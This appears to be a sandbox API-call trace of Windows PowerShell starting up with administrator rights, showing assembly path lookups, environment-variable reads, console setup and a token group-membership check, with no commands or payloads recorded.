	[0248.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x20d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0248.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x20d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0248.225] CoTaskMemAlloc (cb=0x104) returned 0x4b0130
	[0248.225] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4b0130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0248.225] CoTaskMemFree (pv=0x4b0130) 
	[0248.226] CoTaskMemAlloc (cb=0x104) returned 0x4ae450
	[0248.226] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0248.226] CoTaskMemFree (pv=0x4ae450) 
	[0248.368] CoTaskMemAlloc (cb=0x104) returned 0x4ae450
	[0248.368] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0248.368] CoTaskMemFree (pv=0x4ae450) 
	[0248.369] CoTaskMemAlloc (cb=0x104) returned 0x4ae450
	[0248.369] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0248.369] CoTaskMemFree (pv=0x4ae450) 
	[0248.370] CoTaskMemAlloc (cb=0x104) returned 0x4ae450
	[0248.370] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0248.370] CoTaskMemFree (pv=0x4ae450) 
	[0248.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x20d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0248.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x20d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0248.773] CoTaskMemAlloc (cb=0x104) returned 0x4ae450
	[0248.773] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0248.773] CoTaskMemFree (pv=0x4ae450) 
	[0248.777] CoTaskMemAlloc (cb=0x104) returned 0x4ae450
	[0248.777] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0248.777] CoTaskMemFree (pv=0x4ae450) 
	[0248.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0248.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0252.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x20d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0252.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x20d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0253.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0253.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0255.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x20d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0255.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x20d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0256.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0256.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0257.316] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0257.316] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0257.316] CoTaskMemFree (pv=0x4ae670) 
	[0257.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0257.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0257.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0257.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0258.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x20d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0258.297] SetErrorMode (uMode=0x1) returned 0x1
	[0258.297] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x20d600 | out: lpFileInformation=0x20d600*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0258.297] SetErrorMode (uMode=0x1) returned 0x1
	[0260.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0260.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0260.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0260.080] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0260.080] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0260.080] CoTaskMemFree (pv=0x4ae670) 
	[0260.082] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0260.082] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0260.082] CoTaskMemFree (pv=0x4ae670) 
	[0260.083] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0260.083] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0260.083] CoTaskMemFree (pv=0x4ae670) 
	[0260.085] CoCreateGuid (in: pguid=0x20d9c8 | out: pguid=0x20d9c8*(Data1=0xfcad8c5, Data2=0x5ee6, Data3=0x4d65, Data4=([0]=0x8d, [1]=0xbc, [2]=0x5d, [3]=0xad, [4]=0x10, [5]=0x3e, [6]=0x61, [7]=0xeb))) returned 0x0
	[0260.089] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0260.089] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0260.089] CoTaskMemFree (pv=0x4ae670) 
	[0260.091] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0260.091] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0260.091] CoTaskMemFree (pv=0x4ae670) 
	[0260.093] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0260.093] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0260.093] CoTaskMemFree (pv=0x4ae670) 
	[0260.098] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0260.400] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x20d670 | out: lpConsoleScreenBufferInfo=0x20d670) returned 1
	[0260.405] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0260.406] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x20d670 | out: lpConsoleScreenBufferInfo=0x20d670) returned 1
	[0260.407] GetVersionExW (in: lpVersionInformation=0x20d600*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x20d600*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0260.409] GetCurrentProcess () returned 0xffffffffffffffff
	[0260.410] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x20d698 | out: TokenHandle=0x20d698*=0x320) returned 1
	[0260.413] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20d5b8 | out: TokenInformation=0x0, ReturnLength=0x20d5b8) returned 0
	[0260.414] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x407260
	[0260.414] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x407260, TokenInformationLength=0x4, ReturnLength=0x20d5b8 | out: TokenInformation=0x407260, ReturnLength=0x20d5b8) returned 1
	[0260.415] DuplicateTokenEx (in: hExistingToken=0x320, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x20d718 | out: phNewToken=0x20d718*=0x31c) returned 1
	[0260.416] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20d5b8 | out: TokenInformation=0x0, ReturnLength=0x20d5b8) returned 0
	[0260.416] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x407290
	[0260.416] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x407290, TokenInformationLength=0x4, ReturnLength=0x20d5b8 | out: TokenInformation=0x407290, ReturnLength=0x20d5b8) returned 1
	[0260.417] CheckTokenMembership (in: TokenHandle=0x31c, SidToCheck=0x2c7c368*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x20d728 | out: IsMember=0x20d728) returned 1
	[0260.417] CloseHandle (hObject=0x31c) returned 1
	[0260.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0260.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0260.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0260.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0260.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0260.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0260.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0260.440] CoTaskMemAlloc (cb=0x804) returned 0x1b77e080
	[0260.440] GetConsoleTitleW (in: lpConsoleTitle=0x1b77e080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0260.742] CoTaskMemFree (pv=0x1b77e080) 
	[0260.780] CoTaskMemAlloc (cb=0x804) returned 0x1b77e930
	[0260.780] GetConsoleTitleW (in: lpConsoleTitle=0x1b77e930, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0261.089] CoTaskMemFree (pv=0x1b77e930) 
	[0261.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.091] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0261.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0261.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
